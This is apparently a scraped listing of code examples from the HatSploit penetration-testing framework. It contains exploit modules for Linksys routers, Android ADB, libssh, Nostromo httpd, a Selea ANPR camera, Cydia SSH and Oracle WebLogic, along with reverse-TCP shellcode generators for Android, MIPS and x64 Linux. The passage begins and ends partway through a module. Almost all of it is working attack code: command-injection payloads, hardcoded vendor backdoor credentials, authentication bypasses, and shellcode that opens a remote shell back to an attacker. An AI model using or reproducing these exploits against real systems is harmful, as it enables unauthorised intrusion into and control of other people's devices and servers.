        self.output_process(f"Exploiting {remote_host}...")
        self.handle_session(
            host=local_host,
            port=local_port,
            payload=self.payload,
            sender=self.execute_command,
            args=[remote_host, remote_port],
            timeout=10
        )
コード例 #18
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Linksys E-Series tmUnblock Remote Code Execution",
        'Module': "exploit/unix/linksys/eseries_tmunblock_rce",
        'Authors': ['Ivan Nikolsky (enty8080)', 'Johannes Ullrich (jullrich)'],
        'Description': "Remote Code Execution in Linksys E-Series.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "linux/mipsle/shell_reverse_tcp",
        'Categories': None,
        'Architectures': ['mipsle', 'mipsbe', 'generic'],
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        payload = {
            "submit_button": "",
            "change_action": "",
            "action": "",
            "commit": "0",
            "ttcp_num": "2",
            "ttcp_size": "2",
            "ttcp_ip": f"-h `{command}`",
            "StartEPI": "1"
        }

        self.http_request(method="POST",
                          host=remote_host,
                          port=remote_port,
                          data=payload)

    def check_vulnerable(self, remote_host, remote_port):
        response = self.http_request(method="GET",
                                     host=remote_host,
                                     port=remote_port,
                                     path="/tmUnblock.cgi")

        if response is None or response.status_code != 200:
            return False

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #19
0
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Android armle Shell Reverse TCP",
        'Payload': "android/armle/shell_reverse_tcp",
        'Authors': [
            'Ivan Nikolsky (enty8080)'
        ],
        'Description': "Shell reverse TCP payload for Android armle.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Architecture': "armle",
        'Platform': "android",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FORMAT': {
            'Description': "Executable format.",
            'Value': "elf",
            'Type': None,
            'Required': True
        }
    }

    def run(self):
        local_host, local_port, executable_format = self.parse_options(self.options)

        local_host = self.host_to_bytes(local_host)
        local_port = self.port_to_bytes(local_port)

        if executable_format not in self.formats.keys():
            self.output_error("Invalid executable format!")
            return

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x01\x10\x8F\xE2"
            b"\x11\xFF\x2F\xE1"
            b"\x02\x20\x01\x21"
            b"\x92\x1A\x0F\x02"
            b"\x19\x37\x01\xDF"
            b"\x06\x1C\x08\xA1"
            b"\x10\x22\x02\x37"
            b"\x01\xDF\x3F\x27"
            b"\x02\x21\x30\x1c"
            b"\x01\xdf\x01\x39"
            b"\xFB\xD5\x05\xA0"
            b"\x92\x1a\x05\xb4"
            b"\x69\x46\x0b\x27"
            b"\x01\xDF\xC0\x46"
            b"\x02\x00" + local_port +       # "\x12\x34" struct sockaddr and port
            + local_host +                   # reverse ip address
            b"\x2f\x73\x79\x73\x74\x65\x6d"  # /system
            b"\x2f\x62\x69\x6e"              # /bin
            b"\x2f\x73\x68\x00"              # /sh\0
        )

        self.output_process("Generating payload...")
        payload = self.generate(executable_format, 'armle', shellcode)

        return payload
コード例 #20
0
class HatSploitModule(Module, Handler, ADBClient, TCPClient):
    details = {
        'Name': "Android ADB Remote Code Execution",
        'Module': "exploit/android/adb/remote_code_execution",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Remote Code Execution in Android ADB.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "android",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/sh_reverse_tcp",
        'Categories': None,
        'Architectures': ['armle', 'aarch64', 'generic'],
        'Platforms': ['android', 'linux', 'unix'],
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def adb_clean_up(self):
        self.output_process("Stopping ADB server...")

        if not self.stop_adb_server():
            self.output_error("Failed to stop ADB server!")

    def adb_execute_command(self, command):
        command_output = self.execute_adb_command("shell", command)
        return True, command_output

    def adb_start_server(self):
        self.output_process("Starting ADB server...")

        if not self.start_adb_server():
            self.output_error("Failed to start ADB server!")
            return

    def run(self):
        remote_host, local_host, local_port = self.parse_options(self.options)

        self.output_process("Checking ADB installation...")
        if not self.check_adb_installation():
            self.output_error("ADB is not installed!")
            return

        self.adb_start_server()
        self.output_process(f"Exploiting {remote_host}...")

        if not self.connect_adb_client(remote_host):
            self.output_error("Exploit failed!")
            self.clean_up()
            return

        if not self.check_connected(remote_host):
            self.output_error("Exploit failed!")
            self.clean_up()
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.adb_execute_command,
                            timeout=10)
コード例 #21
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Linksys WVBR0 25 Remote Code Execution",
        'Module': "exploit/unix/linksys/wvbr0_25_rce",
        'Authors': ['Ivan Nikolsky (enty8080)', 'HeadlessZeke (headlesszeke)'],
        'Description': "Remote Code Execution in Linksys WVBR0 25.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/netcat_reverse_tcp",
        'Categories': None,
        'Architectures': ['mipsle', 'mipsbe', 'generic'],
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        payload = f"\"; {command} #"

        self.http_request(method="GET",
                          host=remote_host,
                          port=remote_port,
                          headers={'User-Agent': payload})

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #22
0
class HatSploitPayload(Payload, HatVenom, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux mipsbe Shell Reverse TCP",
        'Payload': "linux/mipsbe/shell_reverse_tcp",
        'Authors': [
            'Ivan Nikolsky (enty8080)'
        ],
        'Description': "Shell reverse TCP payload for Linux mipsbe.",
        'Dependencies': [
            ''
        ],
        'Comments': [
            ''
        ],
        'Architecture': "mipsbe",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        local_host, local_port = self.parse_options(self.options)

        offsets = {
            'lport': local_port,
            'lhost1': self.ip_bytes(local_host)[:2],
            'lhost2': self.ip_bytes(local_host)[2:]
        }

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x28\x04\xff\xff"  # slti     a0,zero,-1
            b"\x24\x02\x0f\xa6"  # li       v0,4006
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x28\x04\x11\x11"  # slti     a0,zero,4369
            b"\x24\x02\x0f\xa6"  # li       v0,4006
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x24\x0c\xff\xfd"  # li       t4,-3
            b"\x01\x80\x20\x27"  # nor      a0,t4,zero
            b"\x24\x02\x0f\xa6"  # li       v0,4006
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x24\x0c\xff\xfd"  # li       t4,-3
            b"\x01\x80\x20\x27"  # nor      a0,t4,zero
            b"\x01\x80\x28\x27"  # nor      a1,t4,zero
            b"\x28\x06\xff\xff"  # slti     a2,zero,-1
            b"\x24\x02\x10\x57"  # li       v0,4183
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x30\x44\xff\xff"  # andi     a0,v0,0xffff
            b"\x24\x02\x0f\xc9"  # li       v0,4041
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x24\x02\x0f\xc9"  # li       v0,4041
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x3c\x05\x00\x02"  # lui      a1,0x2
            b"\x34\xa5:lport:port:"  # "\x7a\x69"  # ori   a1,a1,0x7a69
            b"\xaf\xa5\xff\xf8"  # sw       a1,-8(sp)
            b"\x3c\x05:lhost1:"  # "\xc0\xa8"  # lui   a1,0xc0a8
            b"\x34\xa5:lhost2:"  # "\x01\x37"  # ori   a1,a1,0x137
            b"\xaf\xa5\xff\xfc"  # sw       a1,-4(sp)
            b"\x23\xa5\xff\xf8"  # addi     a1,sp,-8
            b"\x24\x0c\xff\xef"  # li       t4,-17
            b"\x01\x80\x30\x27"  # nor      a2,t4,zero
            b"\x24\x02\x10\x4a"  # li       v0,4170
            b"\x01\x09\x09\x0c"  # syscall  0x42424
            b"\x3c\x08\x2f\x2f"  # lui      t0,0x2f2f
            b"\x35\x08\x62\x69"  # ori      t0,t0,0x6269
            b"\xaf\xa8\xff\xec"  # sw       t0,-20(sp)
            b"\x3c\x08\x6e\x2f"  # lui      t0,0x6e2f
            b"\x35\x08\x73\x68"  # ori      t0,t0,0x7368
            b"\xaf\xa8\xff\xf0"  # sw       t0,-16(sp)
            b"\x28\x07\xff\xff"  # slti     a3,zero,-1
            b"\xaf\xa7\xff\xf4"  # sw       a3,-12(sp)
            b"\xaf\xa7\xff\xfc"  # sw       a3,-4(sp)
            b"\x23\xa4\xff\xec"  # addi     a0,sp,-20
            b"\x23\xa8\xff\xec"  # addi     t0,sp,-20
            b"\xaf\xa8\xff\xf8"  # sw       t0,-8(sp)
            b"\x23\xa5\xff\xf8"  # addi     a1,sp,-8
            b"\x27\xbd\xff\xec"  # addiu    sp,sp,-20
            b"\x28\x06\xff\xff"  # slti     a2,zero,-1
            b"\x24\x02\x0f\xab"  # li       v0,4011
            b"\x00\x90\x93\x4c"  # syscall  0x2424d
        )

        self.output_process("Generating payload...")
        payload = self.generate('elf', 'mipsbe', shellcode, offsets)

        return payload
コード例 #23
0
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux mipsle Shell Reverse TCP",
        'Payload': "linux/mipsle/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for Linux mipsle.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "mipsle",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FORMAT': {
            'Description': "Executable format.",
            'Value': "elf",
            'Type': None,
            'Required': True
        }
    }

    def run(self):
        local_host, local_port, executable_format = self.parse_options(
            self.options)

        local_host = self.host_to_bytes(local_host)
        local_port = self.port_to_bytes(local_port)

        if executable_format not in self.formats.keys():
            self.output_error("Invalid executable format!")
            return

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\xff\xff\x04\x28"  # slti    a0,zero,-1
            b"\xa6\x0f\x02\x24"  # li      v0,4006
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\x11\x11\x04\x28"  # slti    a0,zero,4369
            b"\xa6\x0f\x02\x24"  # li      v0,4006
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\xfd\xff\x0c\x24"  # li      t4,-3
            b"\x27\x20\x80\x01"  # nor     a0,t4,zero
            b"\xa6\x0f\x02\x24"  # li      v0,4006
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\xfd\xff\x0c\x24"  # li      t4,-3
            b"\x27\x20\x80\x01"  # nor     a0,t4,zero
            b"\x27\x28\x80\x01"  # nor     a1,t4,zero
            b"\xff\xff\x06\x28"  # slti    a2,zero,-1
            b"\x57\x10\x02\x24"  # li      v0,4183
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\xff\xff\x44\x30"  # andi    a0,v0,0xffff
            b"\xc9\x0f\x02\x24"  # li      v0,4041
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\xc9\x0f\x02\x24"  # li      v0,4041
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            + local_port + b"\x05\x3c"  # "\x7a\x69" lui     a1,0x697a
            b"\x02\x00\xa5\x34"  # ori     a1,a1,0x2
            b"\xf8\xff\xa5\xaf"  # sw      a1,-8(sp)
            + local_host[2:] + b"\x05\x3c"  # "\x00\x01" lui     a1,0x100
            + local_host[:2] + b"\xa5\x34"  # "\x7f\x00" ori     a1,a1,0x7f
            b"\xfc\xff\xa5\xaf"  # sw      a1,-4(sp)
            b"\xf8\xff\xa5\x23"  # addi    a1,sp,-8
            b"\xef\xff\x0c\x24"  # li      t4,-17
            b"\x27\x30\x80\x01"  # nor     a2,t4,zero
            b"\x4a\x10\x02\x24"  # li      v0,4170
            b"\x0c\x09\x09\x01"  # syscall 0x42424
            b"\x62\x69\x08\x3c"  # lui     t0,0x6962
            b"\x2f\x2f\x08\x35"  # ori     t0,t0,0x2f2f
            b"\xec\xff\xa8\xaf"  # sw      t0,-20(sp)
            b"\x73\x68\x08\x3c"  # lui     t0,0x6873
            b"\x6e\x2f\x08\x35"  # ori     t0,t0,0x2f6e
            b"\xf0\xff\xa8\xaf"  # sw      t0,-16(sp)
            b"\xff\xff\x07\x28"  # slti    a3,zero,-1
            b"\xf4\xff\xa7\xaf"  # sw      a3,-12(sp)
            b"\xfc\xff\xa7\xaf"  # sw      a3,-4(sp)
            b"\xec\xff\xa4\x23"  # addi    a0,sp,-20
            b"\xec\xff\xa8\x23"  # addi    t0,sp,-20
            b"\xf8\xff\xa8\xaf"  # sw      t0,-8(sp)
            b"\xf8\xff\xa5\x23"  # addi    a1,sp,-8
            b"\xec\xff\xbd\x27"  # addiu   sp,sp,-20
            b"\xff\xff\x06\x28"  # slti    a2,zero,-1
            b"\xab\x0f\x02\x24"  # li      v0,4011
            b"\x0c\x09\x09\x01"  # syscall 0x42424
        )

        self.output_process("Generating payload...")
        payload = self.generate(executable_format, 'mipsle', shellcode)

        return payload
コード例 #24
0
class HatSploitModule(Module, Handler, TCPClient):
    buffer_size = 2048
    client = None

    details = {
        'Name':
        "SSH LibSSH Code Execution",
        'Module':
        "exploit/unix/ssh/libssh_code_execution",
        'Authors':
        ['Ivan Nikolsky (enty8080)', 'Peter Winter-Smith (peterwintersmith)'],
        'Description':
        "SSH LibSSH unauthorized access Remote Code Execution.",
        'Dependencies': ['paramiko'],
        'Comments': [''],
        'Platform':
        "unix",
        'Risk':
        "medium"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/netcat_reverse_tcp",
        'Categories': None,
        'Architectures': None,
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 2222,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def obtain_banner(self, remote_host, remote_port):
        try:
            sock = socket.create_connection((remote_host, int(remote_port)))
            sock.settimeout(5)
            banner = sock.recv(self.buffer_size)
            sock.close()

            return banner.split(b'\n')[0].decode().strip()
        except Exception:
            return None

    def check_vulnerable(self, remote_host, remote_port):
        banner = self.obtain_banner(remote_host, remote_port)

        if banner:
            if any(version in banner
                   for version in ['libssh-0.6', 'libssh_0.6']):
                return True
            if any(version in banner
                   for version in ['libssh-0.7', 'libssh_0.7']):
                if int(banner.split('.')[-1]) < 6:
                    return True
            if any(version in banner
                   for version in ['libssh-0.8', 'libssh_0.8']):
                if int(banner.split('.')[-1]) < 4:
                    return True
        return False

    @staticmethod
    def execute_command(remote_host, remote_port, command):
        sock = socket.socket()
        sock.connect((remote_host, int(remote_port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        transport.open_session(timeout=5).exec_command(command)

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")

        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #25
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Nostromo Httpd Remote Code Execution",
        'Module': "exploit/unix/nostromo/remote_code_execution",
        'Authors': ['Ivan Nikolsky (enty8080)', 'sp0re (sp0re)'],
        'Description': "Remote Code Execution in Nostromo Httpd.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "linux/x64/shell_reverse_tcp",
        'Categories': None,
        'Architectures': None,
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        payload = ""
        payload += "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n"
        payload += "Content-Length: 1\r\n\r\necho\necho\n"
        payload += f"{command} 2>&1"

        self.tcp_request(host=remote_host, port=remote_port, data=payload)

    def check_vulnerable(self, remote_host, remote_port):
        response = self.http_request(method="HEAD",
                                     host=remote_host,
                                     port=remote_port,
                                     path="/")

        if response is not None:
            if 'Server' in response.headers.keys():
                server = response.headers['Server']

                if int(server.split('.')[-1]) < 7:
                    return True
        return False

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #26
0
class HatSploitPayload(Payload, PayloadGenerator, TCPClient):
    details = {
        'Category': "stager",
        'Name': "Linux x64 Shell Reverse TCP",
        'Payload': "linux/x64/shell_reverse_tcp",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description': "Shell reverse TCP payload for Linux x64.",
        'Dependencies': [''],
        'Comments': [''],
        'Architecture': "x64",
        'Platform': "linux",
        'Risk': "high",
        'Type': "reverse_tcp"
    }

    options = {
        'LHOST': {
            'Description': "Local host.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'LPORT': {
            'Description': "Local port.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'FORMAT': {
            'Description': "Executable format.",
            'Value': "elf",
            'Type': None,
            'Required': True
        }
    }

    def run(self):
        local_host, local_port, executable_format = self.parse_options(
            self.options)

        local_host = self.host_to_bytes(local_host)
        local_port = self.port_to_bytes(local_port)

        if executable_format not in self.formats.keys():
            self.output_error("Invalid executable format!")
            return

        self.output_process("Generating shellcode...")
        shellcode = (
            b"\x6a\x29"  # pushq  $0x29
            b"\x58"  # pop    %rax
            b"\x99"  # cltd
            b"\x6a\x02"  # pushq  $0x2
            b"\x5f"  # pop    %rdi
            b"\x6a\x01"  # pushq  $0x1
            b"\x5e"  # pop    %rsi
            b"\x0f\x05"  # syscall
            b"\x48\x97"  # xchg   %rax,%rdi
            b"\x48\xb9\x02\x00"  # movabs $0x100007fb3150002,%rcx
            + local_port +  # port
            +local_host +  # ip
            b"\x51"  # push   %rcx
            b"\x48\x89\xe6"  # mov    %rsp,%rsi
            b"\x6a\x10"  # pushq  $0x10
            b"\x5a"  # pop    %rdx
            b"\x6a\x2a"  # pushq  $0x2a
            b"\x58"  # pop    %rax
            b"\x0f\x05"  # syscall
            b"\x6a\x03"  # pushq  $0x3
            b"\x5e"  # pop    %rsi
            b"\x48\xff\xce"  # dec    %rsi
            b"\x6a\x21"  # pushq  $0x21
            b"\x58"  # pop    %rax
            b"\x0f\x05"  # syscall
            b"\x75\xf6"  # jne    27 <dup2_loop>
            b"\x6a\x3b"  # pushq  $0x3b
            b"\x58"  # pop    %rax
            b"\x99"  # cltd
            b"\x48\xbb\x2f\x62\x69\x6e\x2f"  # movabs $0x68732f6e69622f,%rbx
            b"\x73\x68\x00"  # [redacted]
            b"\x53"  # push   %rbx
            b"\x48\x89\xe7"  # mov    %rsp,%rdi
            b"\x52"  # push   %rdx
            b"\x57"  # push   %rdi
            b"\x48\x89\xe6"  # mov    %rsp,%rsi
            b"\x0f\x05"  # syscall
        )

        self.output_process("Generating payload...")
        payload = self.generate(executable_format, 'x64', shellcode)

        return payload
コード例 #27
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Selea ANPR Camera Authenticated RCE",
        'Module': "exploit/unix/selea/anpr_authenticated_rce",
        'Authors': ['Ivan Nikolsky (enty8080)', 'LiquidWorm (liquidworm)'],
        'Description':
        "Selea ANPR Camera authenticated remote code execution.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/netcat_reverse_tcp",
        'Categories': None,
        'Architectures': ['mipsle', 'mipsbe', 'generic'],
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 81,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        },
        'USERNAME': {
            'Description': "Username for authorization.",
            'Value': "admin",
            'Type': None,
            'Required': True
        },
        'PASSWORD': {
            'Description': "Password for authorization.",
            'Value': None,
            'Type': None,
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, username, password,
                        command):
        auth_token = base64.b64encode(f"{username}:{password}".encode())
        headers = {'Authorization': f"Basic {auth_token.decode()}"}
        payload = f"/cgi-bin/utils.php?cmd=addr_check&addr=1.3.3.7\ $({command})&type=port&port=80"

        self.http_request(method="GET",
                          host=remote_host,
                          port=remote_port,
                          path=payload,
                          headers=header)

    def run(self):
        remote_host, remote_port, username, password = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        self.handle_session(
            host=local_host,
            port=local_port,
            payload=self.payload,
            sender=self.execute_command,
            args=[remote_host, remote_port, username, password],
            timeout=10)
コード例 #28
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Linksys WAP54Gv3 debug Remote Code Execution",
        'Module': "exploit/unix/linksys/wap54gv3_debug_rce",
        'Authors': ['Ivan Nikolsky (enty8080)', 'Phil Purviance'],
        'Description': "Remote Code Execution in Linksys WAP54Gv3.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "linux/mipsle/shell_reverse_tcp",
        'Categories': None,
        'Architectures': ['mipsle', 'mipsbe', 'generic'],
        'Platforms': None,
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 80,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        payload = {"data1": command, "command": "ui_debug"}

        self.http_request(method="POST",
                          host=remote_host,
                          port=remote_port,
                          path='/debug.cgi',
                          data=payload,
                          auth=("Gemtek", "gemtekswd"))

    def check_vulnerable(self, remote_host, remote_port):
        response = self.http_request(method="GET",
                                     host=remote_host,
                                     port=remote_port,
                                     path="/debug.cgi",
                                     auth=("Gemtek", "gemtekswd"))

        if response is None or response.status_code != 200:
            return False

    def run(self):
        remote_host, remote_port, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        if not self.check_vulnerable(remote_host, remote_port):
            self.output_error("Exploit failed!")
            return

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=self.execute_command,
                            args=[remote_host, remote_port],
                            timeout=10)
コード例 #29
0
class HatSploitModule(Module, Handler, TCPClient):
    details = {
        'Name': "iPhoneOS SSH Cydia.app Default Password",
        'Module': "exploit/iphoneos/ssh/cydia_default_password",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description':
        "Bypass iPhoneOS SSH authorization using Cydia.app default SSH password.",
        'Dependencies': ['paramiko'],
        'Comments': [''],
        'Platform': "iphoneos",
        'Risk': "medium"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/bash_reverse_tcp",
        'Categories': None,
        'Architectures': ['armle', 'aarch64', 'generic'],
        'Platforms': ['iphoneos', 'linux', 'unix'],
        'Types': None
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': 22,
            'Type': "port",
            'Required': True
        },
        'USERNAME': {
            'Description': "Shell username.",
            'Value': "mobile",
            'Type': None,
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def run(self):
        remote_host, remote_port, username, local_host, local_port = self.parse_options(
            self.options)

        self.output_process(f"Exploiting {remote_host}...")
        self.output_process(f"Logging as {username}...")
        try:
            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            client.connect(remote_host,
                           port=remote_port,
                           username=username,
                           password='******')
        except Exception:
            self.output_error("Exploit failed!")
            return
        self.output_success(f"Successfully logged as {username}!")

        self.handle_session(host=local_host,
                            port=local_port,
                            payload=self.payload,
                            sender=client.exec_command,
                            timeout=10)

        client.close()
コード例 #30
0
class HatSploitModule(Module, Handler, HTTPClient, TCPClient):
    details = {
        'Name': "Oracle Weblogic console RCE",
        'Module': "exploit/unix/oracle/weblogic_console_rce",
        'Authors': ['Ivan Nikolsky (enty8080)'],
        'Description':
        "Remote Code Execution in Oracle Weblogic <= 14.1.1.0.0.",
        'Dependencies': [''],
        'Comments': [''],
        'Platform': "unix",
        'Risk': "high"
    }

    payload = {
        'Description': "Payload to use.",
        'Value': "unix/generic/netcat_reverse_tcp",
        'Categories': ['single'],
        'Architectures': None,
        'Platforms': None,
        'Types': ['reverse_tcp']
    }

    options = {
        'RHOST': {
            'Description': "Remote host.",
            'Value': None,
            'Type': "ip",
            'Required': True
        },
        'RPORT': {
            'Description': "Remote port.",
            'Value': None,
            'Type': "port",
            'Required': True
        },
        'SRVHOST': {
            'Description': "Local host to listen on.",
            'Value': TCPClient.get_local_host(),
            'Type': "ip",
            'Required': True
        },
        'SRVPORT': {
            'Description': "Local port to listen on.",
            'Value': 8888,
            'Type': "port",
            'Required': True
        }
    }

    def execute_command(self, remote_host, remote_port, command):
        path = "/console/images/%252E%252E%252Fconsole.portal"
